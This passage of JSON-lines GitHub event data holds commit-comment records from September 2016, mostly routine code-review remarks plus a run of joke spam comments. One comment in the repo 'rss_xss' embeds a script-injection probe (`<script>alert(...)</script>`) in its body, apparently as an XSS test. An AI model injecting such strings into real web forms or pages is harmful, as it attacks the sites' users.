href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-51c455dfba7bcbc70740fe5af88295896005561b-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.91%25-yellow.svg)</a> \n"}},"created_at":"2016-09-06T23:35:11Z"}
{"id":"4524558200","type":"CommitCommentEvent","actor":{"login":"ipapapa"},"repo":{"name":"Netflix/dyno"},"payload":{"comment":{"id":18920878,"position":36,"line":44,"path":"dyno-core/src/main/java/com/netflix/dyno/connectionpool/impl/lb/HttpEndpointBasedTokenMapSupplier.java","commit_id":"e38f719636c35902774fd2821ff224c1e13a097d","created_at":"2016-09-06T23:36:06Z","updated_at":"2016-09-06T23:36:06Z","body":"It is there in master branch: https://github.com/Netflix/dyno/blob/master/dyno-core/src/main/java/com/netflix/dyno/connectionpool/impl/lb/HttpEndpointBasedTokenMapSupplier.java#L43"}},"created_at":"2016-09-06T23:36:06Z"}
{"id":"4524558323","type":"CommitCommentEvent","actor":{"login":"crimsondusk"},"repo":{"name":"coelckers/gzdoom"},"payload":{"comment":{"id":18920880,"position":23,"line":1549,"path":"src/CMakeLists.txt","commit_id":"aece9aaa58bed5864fde2e7a84976e0afaf5288f","created_at":"2016-09-06T23:36:09Z","updated_at":"2016-09-06T23:36:09Z","body":"This line doesn't seem quite right, is there meant to be `/gl/xbrz` instead of `/gl/hqnx_asm`?"}},"created_at":"2016-09-06T23:36:09Z"}
{"id":"4524558951","type":"CommitCommentEvent","actor":{"login":"pacastillo"},"repo":{"name":"geneura-papers/2015_books"},"payload":{"comment":{"id":18920886,"position":null,"line":null,"path":null,"commit_id":"34fdeb0090aee4e828fb484c5568fc1a4a1d9fcd","created_at":"2016-09-06T23:36:20Z","updated_at":"2016-09-06T23:36:20Z","body":"I agree. That term is adequate "}},"created_at":"2016-09-06T23:36:20Z"}
{"id":"4524565611","type":"CommitCommentEvent","actor":{"login":"aaronlehmann"},"repo":{"name":"aaronlehmann/swarmkit"},"payload":{"comment":{"id":18920897,"position":49,"line":55,"path":"manager/scheduler/nodeset.go","commit_id":"db2c93cf12271e55abd4e38a4b526551487a4621","created_at":"2016-09-06T23:38:17Z","updated_at":"2016-09-06T23:38:17Z","body":"Ah. Yes, it should."}},"created_at":"2016-09-06T23:38:17Z"}
{"id":"4524566498","type":"CommitCommentEvent","actor":{"login":"ErikBoesen"},"repo":{"name":"TheAndroidMaster/Status"},"payload":{"comment":{"id":18920898,"position":null,"line":null,"path":null,"commit_id":"a355813451f33aadd226554bee849ce9165327f0","created_at":"2016-09-06T23:38:35Z","updated_at":"2016-09-06T23:38:35Z","body":"boogw boogw boogw boogw boogw boogw boogw boogw boogw boogw boogw boogw boogw boogw boogw boogw boogw boogw boogw boogw boogw boogw boogw boogw"}},"created_at":"2016-09-06T23:38:35Z"}
{"id":"4524568888","type":"CommitCommentEvent","actor":{"login":"ErikBoesen"},"repo":{"name":"TheAndroidMaster/Status"},"payload":{"comment":{"id":18920901,"position":null,"line":null,"path":null,"commit_id":"a355813451f33aadd226554bee849ce9165327f0","created_at":"2016-09-06T23:39:21Z","updated_at":"2016-09-06T23:39:21Z","body":"I hate it when boogws bite me during the summer."}},"created_at":"2016-09-06T23:39:21Z"}
{"id":"4524570523","type":"CommitCommentEvent","actor":{"login":"ErikBoesen"},"repo":{"name":"TheAndroidMaster/Status"},"payload":{"comment":{"id":18920904,"position":null,"line":null,"path":null,"commit_id":"a355813451f33aadd226554bee849ce9165327f0","created_at":"2016-09-06T23:39:51Z","updated_at":"2016-09-06T23:39:51Z","body":"Boogw spray sometimes causes cancer I've heard, so I can't use it."}},"created_at":"2016-09-06T23:39:51Z"}
{"id":"4524574002","type":"CommitCommentEvent","actor":{"login":"ErikBoesen"},"repo":{"name":"TheAndroidMaster/Status"},"payload":{"comment":{"id":18920915,"position":null,"line":null,"path":null,"commit_id":"a355813451f33aadd226554bee849ce9165327f0","created_at":"2016-09-06T23:40:53Z","updated_at":"2016-09-06T23:40:53Z","body":"I love the movie Boogw's Life."}},"created_at":"2016-09-06T23:40:53Z"}
{"id":"4524575982","type":"CommitCommentEvent","actor":{"login":"ErikBoesen"},"repo":{"name":"TheAndroidMaster/Status"},"payload":{"comment":{"id":18920920,"position":null,"line":null,"path":null,"commit_id":"a355813451f33aadd226554bee849ce9165327f0","created_at":"2016-09-06T23:41:27Z","updated_at":"2016-09-06T23:41:27Z","body":"I got sick with a stomach boogw the other day."}},"created_at":"2016-09-06T23:41:27Z"}
{"id":"4524577453","type":"CommitCommentEvent","actor":{"login":"ipapapa"},"repo":{"name":"Netflix/dyno"},"payload":{"comment":{"id":18920922,"position":36,"line":44,"path":"dyno-core/src/main/java/com/netflix/dyno/connectionpool/impl/lb/HttpEndpointBasedTokenMapSupplier.java","commit_id":"e38f719636c35902774fd2821ff224c1e13a097d","created_at":"2016-09-06T23:41:53Z","updated_at":"2016-09-06T23:41:53Z","body":"It seems I skipped the port, but added it now https://github.com/Netflix/dyno/commit/8a73fc15cb824682e121d4530bf37da9a32f489d"}},"created_at":"2016-09-06T23:41:53Z"}
{"id":"4524578033","type":"CommitCommentEvent","actor":{"login":"ErikBoesen"},"repo":{"name":"TheAndroidMaster/Status"},"payload":{"comment":{"id":18920923,"position":null,"line":null,"path":null,"commit_id":"a355813451f33aadd226554bee849ce9165327f0","created_at":"2016-09-06T23:42:05Z","updated_at":"2016-09-06T23:42:05Z","body":"The movie Boogw (2006) was very good, if scary."}},"created_at":"2016-09-06T23:42:05Z"}
{"id":"4524579512","type":"CommitCommentEvent","actor":{"login":"dongluochen"},"repo":{"name":"aaronlehmann/swarmkit"},"payload":{"comment":{"id":18920925,"position":69,"line":528,"path":"manager/scheduler/scheduler.go","commit_id":"db2c93cf12271e55abd4e38a4b526551487a4621","created_at":"2016-09-06T23:42:29Z","updated_at":"2016-09-06T23:42:29Z","body":"Would it improve readability to move the rest of code into a separate function `scheduleTasksOnLeaf()`? "}},"created_at":"2016-09-06T23:42:29Z"}
{"id":"4524580504","type":"CommitCommentEvent","actor":{"login":"rbong"},"repo":{"name":"rbong/galvanize.vim"},"payload":{"comment":{"id":18920927,"position":27,"line":387,"path":"plugin/galvanize.vim","commit_id":"872d66a55f19879f95c2d38f8904c1bac3c9f611","created_at":"2016-09-06T23:42:44Z","updated_at":"2016-09-06T23:42:44Z","body":"Thanks, I always wondered how to do that."}},"created_at":"2016-09-06T23:42:44Z"}
{"id":"4524584622","type":"CommitCommentEvent","actor":{"login":"EEIT87Team03"},"repo":{"name":"EEIT87Team03/Aoide"},"payload":{"comment":{"id":18920935,"position":null,"line":null,"path":null,"commit_id":"dd4262399870728f9e3b38bef8597a23cd325746","created_at":"2016-09-06T23:43:59Z","updated_at":"2016-09-06T23:43:59Z","body":"水喔~感謝B大鼎力相助\r\n"}},"created_at":"2016-09-06T23:43:59Z"}
{"id":"4524584749","type":"CommitCommentEvent","actor":{"login":"ErikBoesen"},"repo":{"name":"TheAndroidMaster/Status"},"payload":{"comment":{"id":18920936,"position":null,"line":null,"path":null,"commit_id":"a355813451f33aadd226554bee849ce9165327f0","created_at":"2016-09-06T23:44:01Z","updated_at":"2016-09-06T23:44:01Z","body":"Boogw, Germany, is a very nice town with many great tourist destinations."}},"created_at":"2016-09-06T23:44:01Z"}
{"id":"4524587060","type":"CommitCommentEvent","actor":{"login":"howtonotwin"},"repo":{"name":"Vazkii/BotaniaV2"},"payload":{"comment":{"id":18920938,"position":null,"line":null,"path":null,"commit_id":"88ab3e41fd90bfcce9998af7b35ece82fa333596","created_at":"2016-09-06T23:44:43Z","updated_at":"2016-09-06T23:44:43Z","body":"It seems like you forgot to actually import LibMisc. :P"}},"created_at":"2016-09-06T23:44:43Z"}
{"id":"4524587599","type":"CommitCommentEvent","actor":{"login":"ErikBoesen"},"repo":{"name":"TheAndroidMaster/Status"},"payload":{"comment":{"id":18920940,"position":null,"line":null,"path":null,"commit_id":"a355813451f33aadd226554bee849ce9165327f0","created_at":"2016-09-06T23:44:52Z","updated_at":"2016-09-06T23:44:52Z","body":"As is Boogw, Germany."}},"created_at":"2016-09-06T23:44:52Z"}
{"id":"4524589286","type":"CommitCommentEvent","actor":{"login":"ErikBoesen"},"repo":{"name":"TheAndroidMaster/Status"},"payload":{"comment":{"id":18920941,"position":null,"line":null,"path":null,"commit_id":"a355813451f33aadd226554bee849ce9165327f0","created_at":"2016-09-06T23:45:22Z","updated_at":"2016-09-06T23:45:22Z","body":"During the Cold War, the Russians boogwwed the White House."}},"created_at":"2016-09-06T23:45:22Z"}
{"id":"4524591310","type":"CommitCommentEvent","actor":{"login":"aaronlehmann"},"repo":{"name":"aaronlehmann/swarmkit"},"payload":{"comment":{"id":18920949,"position":69,"line":528,"path":"manager/scheduler/scheduler.go","commit_id":"db2c93cf12271e55abd4e38a4b526551487a4621","created_at":"2016-09-06T23:45:58Z","updated_at":"2016-09-06T23:45:58Z","body":"Yes, I think it would. Then we could have\r\n\r\n```go\r\nif tree.next == nil {\r\n        return scheduleTasksOnLeaf(...)\r\n}\r\n```\r\n\r\nand we could unindent all the code above.\r\n\r\nThe problem is that there are a lot of parameters, so the function call may be ugly."}},"created_at":"2016-09-06T23:45:58Z"}
{"id":"4524596173","type":"CommitCommentEvent","actor":{"login":"amorag"},"repo":{"name":"geneura-papers/2015_books"},"payload":{"comment":{"id":18920959,"position":null,"line":null,"path":null,"commit_id":"34fdeb0090aee4e828fb484c5568fc1a4a1d9fcd","created_at":"2016-09-06T23:47:23Z","updated_at":"2016-09-06T23:47:23Z","body":"Ok, not linear models, but they are 'obtained' or automatically generated, rather than 'developed', don't you think?\r\n\r\n'Developed' seems to mean that we have implemented them somehow manually. :D"}},"created_at":"2016-09-06T23:47:23Z"}
{"id":"4524597641","type":"CommitCommentEvent","actor":{"login":"dongluochen"},"repo":{"name":"aaronlehmann/swarmkit"},"payload":{"comment":{"id":18920962,"position":23,"line":483,"path":"manager/scheduler/scheduler.go","commit_id":"db2c93cf12271e55abd4e38a4b526551487a4621","created_at":"2016-09-06T23:47:48Z","updated_at":"2016-09-06T23:47:48Z","body":"I think we need unit tests to validate this. "}},"created_at":"2016-09-06T23:47:48Z"}
{"id":"4524598392","type":"CommitCommentEvent","actor":{"login":"jamesleesaunders"},"repo":{"name":"jamesleesaunders/python-xbee"},"payload":{"comment":{"id":18920966,"position":null,"line":null,"path":null,"commit_id":"e2c81d30266637bbf7ef8eb32e05c8c45e9650ff","created_at":"2016-09-06T23:48:01Z","updated_at":"2016-09-06T23:48:01Z","body":"Hi @thom-nic,\r\n\r\nYou may have noticed I pilfered your python-xbee Serial re-initialise code to try and bring it up-to-date and get it working properly :-)\r\n\r\nAfter painstakingly cherry-picking and merging your code with the latest master, I have kind of got it working again... some of the time. But it does not work all the time. I don't suppose you are interested in dipping your finger in again? \r\nSee: https://github.com/jamesleesaunders/python-xbee/tree/serial-re-init\r\nI hope you are happy with me progressing this? I will of course give you credit where due if/when I submit it for PR to upstream.\r\n\r\nI have also asked one of the other python-xbee developers to also take a look to see if they can help.\r\n\r\nJim"}},"created_at":"2016-09-06T23:48:01Z"}
{"id":"4524600830","type":"CommitCommentEvent","actor":{"login":"dongluochen"},"repo":{"name":"aaronlehmann/swarmkit"},"payload":{"comment":{"id":18920972,"position":23,"line":483,"path":"manager/scheduler/scheduler.go","commit_id":"db2c93cf12271e55abd4e38a4b526551487a4621","created_at":"2016-09-06T23:48:48Z","updated_at":"2016-09-06T23:48:48Z","body":"The code looks good to me. But it'd be easy to introduce bugs for its complexity. "}},"created_at":"2016-09-06T23:48:48Z"}
{"id":"4524603060","type":"CommitCommentEvent","actor":{"login":"mattcj"},"repo":{"name":"spring-cloud/spring-cloud-netflix"},"payload":{"comment":{"id":18920976,"position":32,"line":110,"path":"spring-cloud-netflix-core/src/main/java/org/springframework/cloud/netflix/eureka/EurekaClientAutoConfiguration.java","commit_id":"112987206133a5c82da0356c4920894a0bc36f46","created_at":"2016-09-06T23:49:32Z","updated_at":"2016-09-06T23:49:32Z","body":"At this point `instance.getStatusPageUrlPath()` always returns `/info`, even if `eureka.instance.statusPageUrl` is set to a different value via the configuration server."}},"created_at":"2016-09-06T23:49:32Z"}
{"id":"4524607065","type":"CommitCommentEvent","actor":{"login":"mattcj"},"repo":{"name":"spring-cloud/spring-cloud-netflix"},"payload":{"comment":{"id":18920979,"position":33,"line":111,"path":"spring-cloud-netflix-core/src/main/java/org/springframework/cloud/netflix/eureka/EurekaClientAutoConfiguration.java","commit_id":"112987206133a5c82da0356c4920894a0bc36f46","created_at":"2016-09-06T23:50:45Z","updated_at":"2016-09-06T23:50:45Z","body":"At this point `instance.getHealthCheckUrlPath()` always returns `/health`, even if `eureka.instance.healthCheckUrlPath` is set to a different value via the configuration server."}},"created_at":"2016-09-06T23:50:45Z"}
{"id":"4524607628","type":"CommitCommentEvent","actor":{"login":"rstoyanchev"},"repo":{"name":"spring-projects/spring-framework"},"payload":{"comment":{"id":18920981,"position":null,"line":null,"path":null,"commit_id":"72e4fac28d59ed5db3e81efe01ccbcc3a8311dbf","created_at":"2016-09-06T23:50:55Z","updated_at":"2016-09-06T23:50:55Z","body":"I guess my refactoring to those tests didn't work out so well. Thanks Brian!"}},"created_at":"2016-09-06T23:50:55Z"}
{"id":"4524607794","type":"CommitCommentEvent","actor":{"login":"TheAndroidMaster"},"repo":{"name":"TheAndroidMaster/Status"},"payload":{"comment":{"id":18920982,"position":null,"line":null,"path":null,"commit_id":"a355813451f33aadd226554bee849ce9165327f0","created_at":"2016-09-06T23:50:59Z","updated_at":"2016-09-06T23:50:59Z","body":"Dammit help me I can't stop boogwing"}},"created_at":"2016-09-06T23:50:59Z"}
{"id":"4524613547","type":"CommitCommentEvent","actor":{"login":"jenkins-plone-org"},"repo":{"name":"plone/plone.tiles"},"payload":{"comment":{"id":18920987,"position":null,"line":null,"path":null,"commit_id":"067c11f03fab0c6af2e9f4c1669c7002d685b113","created_at":"2016-09-06T23:52:45Z","updated_at":"2016-09-06T23:52:45Z","body":"@mauritsvanrees Jenkins CI reporting about code analysis\nSee the full report here: http://jenkins.plone.org/job/package-plone.tiles/35/violations\n```\nplone/tiles/__init__.py:0:1: I001 isort found changes, run it on the file\nplone/tiles/data.py:148:1: C901 'map_to_pairs' is too complex (12)\nplone/tiles/data.py:196:1: C901 'encode' is too complex (15)\nplone/tiles/data.py:277:1: C901 'decode' is too complex (14)\n```\nFollow [these instructions](https://github.com/plone/jenkins.plone.org/blob/master/docs/source/run-qa-on-package.rst) to reproduce it locally."}},"created_at":"2016-09-06T23:52:45Z"}
{"id":"4524613773","type":"CommitCommentEvent","actor":{"login":"TheAndroidMaster"},"repo":{"name":"TheAndroidMaster/Status"},"payload":{"comment":{"id":18920988,"position":null,"line":null,"path":null,"commit_id":"a355813451f33aadd226554bee849ce9165327f0","created_at":"2016-09-06T23:52:51Z","updated_at":"2016-09-06T23:52:51Z","body":"Never gonna boogw you up, never gonna boogw you down, never gonna boogw around and dessert you... \r\nNever gonna make you boogw, never gonna say goodboogw, never gonna tell a boogw and hurt you..."}},"created_at":"2016-09-06T23:52:51Z"}
{"id":"4524616190","type":"CommitCommentEvent","actor":{"login":"tony-zhu"},"repo":{"name":"tony-zhu/rss_xss"},"payload":{"comment":{"id":18920994,"position":null,"line":null,"path":null,"commit_id":"5fd285c80c564af3304c8f1d71ab218be53e5088","created_at":"2016-09-06T23:53:36Z","updated_at":"2016-09-06T23:53:36Z","body":"Add some real description <script>alert(\"aaa\");</script>"}},"created_at":"2016-09-06T23:53:36Z"}
{"id":"4524616678","type":"CommitCommentEvent","actor":{"login":"7ossam81"},"repo":{"name":"geneura-papers/2015_books"},"payload":{"comment":{"id":18920998,"position":null,"line":null,"path":null,"commit_id":"34fdeb0090aee4e828fb484c5568fc1a4a1d9fcd","created_at":"2016-09-06T23:53:45Z","updated_at":"2016-09-06T23:53:45Z","body":"The term \"developed\" here refers to the final models not the algorithms themselves. For example we used the J48 algorithm to develop a tree model.  Anyway, obtained/generated/developed are used interchangeably  in the literature. You can pick one ;D"}},"created_at":"2016-09-06T23:53:45Z"}
{"id":"4524621186","type":"CommitCommentEvent","actor":{"login":"jqy518"},"repo":{"name":"jqy518/jqy518.github.io"},"payload":{"comment":{"id":18921007,"position":null,"line":null,"path":null,"commit_id":"3ca72b475df99cb8b74f1d59a2967ee26815deb5","created_at":"2016-09-06T23:55:05Z","updated_at":"2016-09-06T23:55:05Z","body":"delete CNAME"}},"created_at":"2016-09-06T23:55:05Z"}
{"id":"4524627567","type":"CommitCommentEvent","actor":{"login":"comp615"},"repo":{"name":"ianfleeton/paypal-express"},"payload":{"comment":{"id":18921030,"position":5,"line":73,"path":"lib/paypal/nvp/response.rb","commit_id":"39bbfa22b16c0ea227af7fd6afda43a4fcd7e11a","created_at":"2016-09-06T23:56:58Z","updated_at":"2016-09-06T23:56:58Z","body":"Extra trailing comma here FYI"}},"created_at":"2016-09-06T23:56:58Z"}
{"id":"4524629682","type":"CommitCommentEvent","actor":{"login":"davis"},"repo":{"name":"belackriv/plugin-hbs"},"payload":{"comment":{"id":18921034,"position":null,"line":null,"path":null,"commit_id":"5eaf20996055f908561d32dbc7e453d43573eaff","created_at":"2016-09-06T23:57:37Z","updated_at":"2016-09-06T23:57:37Z","body":"just a question because i'm curious, but what was the rationale behind this change?"}},"created_at":"2016-09-06T23:57:37Z"}
{"id":"4524631865","type":"CommitCommentEvent","actor":{"login":"Shack4l"},"repo":{"name":"hjnilsson/rme"},"payload":{"comment":{"id":18921041,"position":null,"line":null,"path":null,"commit_id":"fbfd7b9ec690d6dbd8d648391a9f33bd76c8d955","created_at":"2016-09-06T23:58:16Z","updated_at":"2016-09-06T23:58:16Z","body":"Please, WXWidgets 3.1 and which boost?\r\nThx in advance!"}},"created_at":"2016-09-06T23:58:16Z"}
{"id":"4518987559","type":"CommitCommentEvent","actor":{"login":"s18634879388"},"repo":{"name":"s18634879388/sxqTest"},"payload":{"comment":{"id":18905097,"position":null,"line":null,"path":null,"commit_id":"232b8d6e5752dd1a8ebeddab6c714177483ca1ad","created_at":"2016-09-06T03:00:18Z","updated_at":"2016-09-06T03:00:18Z","body":"55555"}},"created_at":"2016-09-06T03:00:18Z"}
{"id":"4518990090","type":"CommitCommentEvent","actor":{"login":"ImperfectWorld"},"repo":{"name":"ImperfectWorld/movieDemo"},"payload":{"comment":{"id":18905103,"position":null,"line":null,"path":null,"commit_id":"d2b150fe7f2fcad20b4d64f8e16cd20ed36d014f","created_at":"2016-09-06T03:01:17Z","updated_at":"2016-09-06T03:01:17Z","body":"页面版本commit"}},"created_at":"2016-09-06T03:01:17Z"}
{"id":"4518991194","type":"CommitCommentEvent","actor":{"login":"rgrinberg"},"repo":{"name":"syl20bnr/spacemacs"},"payload":{"comment":{"id":18905104,"position":null,"line":null,"path":null,"commit_id":"047b57223a8913699bc9ce52aa3046d934f40c9f","created_at":"2016-09-06T03:01:45Z","updated_at":"2016-09-06T03:01:45Z","body":"This commit breaks spacemacs on archlinux for me:\r\n\r\n```\r\nSymbol's value as variable is void: osx-use-dictionary-app\r\n```\r\n\r\nReverting the commit fixes it for me."}},"created_at":"2016-09-06T03:01:45Z"}
{"id":"4518994183","type":"CommitCommentEvent","actor":{"login":"BohuTANG"},"repo":{"name":"BohuTANG/ft-index"},"payload":{"comment":{"id":18905107,"position":null,"line":null,"path":null,"commit_id":"e48ac39c6644114c674f600dbdc4b34788e47091","created_at":"2016-09-06T03:03:10Z","updated_at":"2016-09-06T03:03:10Z","body":"@Jun-Yuan \r\nHello,\r\n\r\nI am pretty sure more TokuDB users need this patch for their backup, lookat here:\r\nhttps://bugs.launchpad.net/percona-server/+bug/1619199\r\n\r\n"}},"created_at":"2016-09-06T03:03:10Z"}
{"id":"4518996326","type":"CommitCommentEvent","actor":{"login":"Rocky640"},"repo":{"name":"lucabrivio/Stockfish"},"payload":{"comment":{"id":18905112,"position":null,"line":null,"path":null,"commit_id":"4b85abbc2a1a8dd7d5802b20839605a20bdcec02","created_at":"2016-09-06T03:04:08Z","updated_at":"2016-09-06T03:04:08Z","body":"You have a warning in http://tests.stockfishchess.org/actions\r\n\r\nstop run: Wrong bench in stockfish Expected: 6991620 Got: 7565631"}},"created_at":"2016-09-06T03:04:08Z"}
{"id":"4518998184","type":"CommitCommentEvent","actor":{"login":"noname00000123"},"repo":{"name":"noname00000123/annotate_models"},"payload":{"comment":{"id":18905115,"position":null,"line":null,"path":null,"commit_id":"6430464b4badfc535b4bf5118e294fc5bf3082ba","created_at":"2016-09-06T03:05:01Z","updated_at":"2016-09-06T03:05:01Z","body":"Runs :set_annotation_options with :remove_annotation task."}},"created_at":"2016-09-06T03:05:01Z"}
{"id":"4519002993","type":"CommitCommentEvent","actor":{"login":"ordavidil"},"repo":{"name":"capacity4dev/capacity4more"},"payload":{"comment":{"id":18905120,"position":11,"line":358,"path":"project/profiles/capacity4more/modules/c4m/og/c4m_og/c4m_og.module","commit_id":"e298e0ddbf078f864002ffd3033deb3be200b470","created_at":"2016-09-06T03:07:13Z","updated_at":"2016-09-06T03:07:13Z","body":"remove this `else` then"}},"created_at":"2016-09-06T03:07:13Z"}
{"id":"4519008548","type":"CommitCommentEvent","actor":{"login":"jack-trikeapps"},"repo":{"name":"tricycle/tricycle.github.com"},"payload":{"comment":{"id":18905129,"position":28,"line":26,"path":"_posts/2016-09-06-a-better-way-to-consult.markdown","commit_id":"40312409c5da76d3ab112546a8f6bf83d15dc0f4","created_at":"2016-09-06T03:09:45Z","updated_at":"2016-09-06T03:09:45Z","body":"replace ellipsis with comma, I think."}},"created_at":"2016-09-06T03:09:45Z"}
{"id":"4519010351","type":"CommitCommentEvent","actor":{"login":"wxy"},"repo":{"name":"LCTT/TranslateProject"},"payload":{"comment":{"id":18905133,"position":null,"line":null,"path":null,"commit_id":"ecd467d1d48590d617b7a6b7d40cd312c9e67cb3","created_at":"2016-09-06T03:10:33Z","updated_at":"2016-09-06T03:10:33Z","body":"原文链接不对，我看不到。。另外原文链接要去掉后面的那些 ?utm 参数。 动态图嘛，先原样放着，我发布时候看看怎么办。"}},"created_at":"2016-09-06T03:10:33Z"}
{"id":"4519012547","type":"CommitCommentEvent","actor":{"login":"wxy"},"repo":{"name":"NearTan/TranslateProject"},"payload":{"comment":{"id":18905136,"position":null,"line":null,"path":null,"commit_id":"4a4bfacc59c959ef5cad476aef2bf4af39eca0c1","created_at":"2016-09-06T03:11:24Z","updated_at":"2016-09-06T03:11:24Z","body":"可以找找 devops 方面的翻译一下。@bestony"}},"created_at":"2016-09-06T03:11:24Z"}
{"id":"4519015228","type":"CommitCommentEvent","actor":{"login":"moggyboy"},"repo":{"name":"tricycle/tricycle.github.com"},"payload":{"comment":{"id":18905140,"position":28,"line":26,"path":"_posts/2016-09-06-a-better-way-to-consult.markdown","commit_id":"40312409c5da76d3ab112546a8f6bf83d15dc0f4","created_at":"2016-09-06T03:12:32Z","updated_at":"2016-09-06T03:12:32Z","body":"That would imply that it's an aside in the sentence `Yes but that basic perverse incentive is an inherent part...` which I don't think makes sense."}},"created_at":"2016-09-06T03:12:32Z"}
{"id":"4519017055","type":"CommitCommentEvent","actor":{"login":"jambilateralus"},"repo":{"name":"jambilateralus/FohorAayo"},"payload":{"comment":{"id":18905143,"position":null,"line":null,"path":null,"commit_id":"a2d4d98fefc076554005e3cc115a9b3a2d369e00","created_at":"2016-09-06T03:13:08Z","updated_at":"2016-09-06T03:13:08Z","body":"https://github.com/codepath/android_guides/wiki/Google-Cloud-Messaging"}},"created_at":"2016-09-06T03:13:08Z"}
{"id":"4519020745","type":"CommitCommentEvent","actor":{"login":"Diefool"},"repo":{"name":"ProgSys/pg_disatools"},"payload":{"comment":{"id":18905151,"position":null,"line":null,"path":null,"commit_id":"61632ba73ddb996ad160e3ccc659bfb45f836ac4","created_at":"2016-09-06T03:14:45Z","updated_at":"2016-09-06T03:14:45Z","body":"Have been out of town for awhile on business, and come back to this?! ProgSys, you are God! <3"}},"created_at":"2016-09-06T03:14:45Z"}
{"id":"4519022095","type":"CommitCommentEvent","actor":{"login":"PoisonLi"},"repo":{"name":"PoisonLi/mooc-js"},"payload":{"comment":{"id":18905157,"position":null,"line":null,"path":null,"commit_id":"50e654b29086e812ba2d54c971e0f5b793c78031","created_at":"2016-09-06T03:15:22Z","updated_at":"2016-09-06T03:15:22Z","body":"一般官网。配色真是辣眼睛。。"}},"created_at":"2016-09-06T03:15:22Z"}
{"id":"4519022865","type":"CommitCommentEvent","actor":{"login":"zhangzaki"},"repo":{"name":"BohuTANG/percona-xtrabackup"},"payload":{"comment":{"id":18905158,"position":null,"line":null,"path":null,"commit_id":"b43ba1b25deff2ba21eb9030b49413e1851f263b","created_at":"2016-09-06T03:15:43Z","updated_at":"2016-09-06T03:15:43Z","body":"Mariadb  10.0.20，Also tested in Mariadb 10.0.26, also have the same problem。"}},"created_at":"2016-09-06T03:15:43Z"}
{"id":"4519023076","type":"CommitCommentEvent","actor":{"login":"dmiller-nmap"},"repo":{"name":"nmap/npcap"},"payload":{"comment":{"id":18905159,"position":null,"line":null,"path":null,"commit_id":"87b126d6c9887bb05f0164953f1eb89a4888c56e","created_at":"2016-09-06T03:15:48Z","updated_at":"2016-09-06T03:15:48Z","body":"@hsluoyz This is unexpected. Did you discuss this change with @fyodor? We just shipped Nmap 7.25BETA2 with Npcap 0.09, and Nmap is intended to work on Windows Vista. What are the particular reasons for dropping support? Did something break?"}},"created_at":"2016-09-06T03:15:48Z"}
{"id":"4519023605","type":"CommitCommentEvent","actor":{"login":"tdang2"},"repo":{"name":"tdang2/tdpharma"},"payload":{"comment":{"id":18905160,"position":null,"line":null,"path":null,"commit_id":"441f44bdb70caa50c8e4f358bb5fe4631e2894d0","created_at":"2016-09-06T03:16:03Z","updated_at":"2016-09-06T03:16:03Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;k0DKDXBs&#x2F;60-server-authentication\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Server authentication</a>"}},"created_at":"2016-09-06T03:16:03Z"}
{"id":"4519024777","type":"CommitCommentEvent","actor":{"login":"zhangzaki"},"repo":{"name":"BohuTANG/percona-xtrabackup"},"payload":{"comment":{"id":18905163,"position":null,"line":null,"path":null,"commit_id":"b43ba1b25deff2ba21eb9030b49413e1851f263b","created_at":"2016-09-06T03:16:35Z","updated_at":"2016-09-06T03:16:35Z","body":"Combination of mariadb 10.0.20 and tokudb 7.5.7。"}},"created_at":"2016-09-06T03:16:35Z"}
{"id":"4519026173","type":"CommitCommentEvent","actor":{"login":"chawasit"},"repo":{"name":"chawasit/cpe200-week3-lab"},"payload":{"comment":{"id":18905167,"position":63,"line":63,"path":"lab3_1/src/cpe200Test/BinaryCalculatorTest.java","commit_id":"1f62e954f3b80f7e7f30a1fb1aff429f0d04437a","created_at":"2016-09-06T03:17:13Z","updated_at":"2016-09-06T03:17:13Z","body":"ตรงนี้ต้องเป็น .division() หรือเปล่าครับ"}},"created_at":"2016-09-06T03:17:13Z"}
{"id":"4519026606","type":"CommitCommentEvent","actor":{"login":"hannazhangtaozi"},"repo":{"name":"tencentyun/qcloud-documents"},"payload":{"comment":{"id":18905168,"position":16,"line":36,"path":"product/域名服务/域名备案/备案简介/备案限制.md","commit_id":"1c276d3a23880f4bb95f6cee665fb7a8abadc9ae","created_at":"2016-09-06T03:17:23Z","updated_at":"2016-09-06T03:17:23Z","body":"哈哈，漏掉一张，已修改并提交。\r\n\r\n发件人: zoeyhe [mailto:notifications@github.com]\r\n发送时间: 2016年8月30日 21:13\r\n收件人: tencentyun/qcloud-documents\r\n抄送: hannazhang(张淘); Author\r\n主题: Re: [tencentyun/qcloud-documents] 修改错误的格式让图片显示出来 (1c276d3)\r\n\r\n\r\n这里没有改过来^^\r\n\r\n—\r\nYou are receiving this because you authored the thread.\r\nReply to this email directly, view it on GitHub<https://github.com/tencentyun/qcloud-documents/commit/1c276d3a23880f4bb95f6cee665fb7a8abadc9ae#commitcomment-18829170>, or mute the thread<https://github.com/notifications/unsubscribe-auth/AT5AnyfRooejOhXviRDmq04h9Skoh_3Lks5qlCxWgaJpZM4JwgoF>.\r\n"}},"created_at":"2016-09-06T03:17:23Z"}
{"id":"4519027012","type":"CommitCommentEvent","actor":{"login":"12345ieee"},"repo":{"name":"scanmem/scanmem"},"payload":{"comment":{"id":18905169,"position":null,"line":null,"path":null,"commit_id":"ab566aed025144c66c9fc31bb18f73a369754db5","created_at":"2016-09-06T03:17:34Z","updated_at":"2016-09-06T03:17:34Z","body":"What do you propose for now?\r\nIf you look at where this thing is used, it's only fed to `printf(\"%s\")` once, to be displayed."}},"created_at":"2016-09-06T03:17:34Z"}
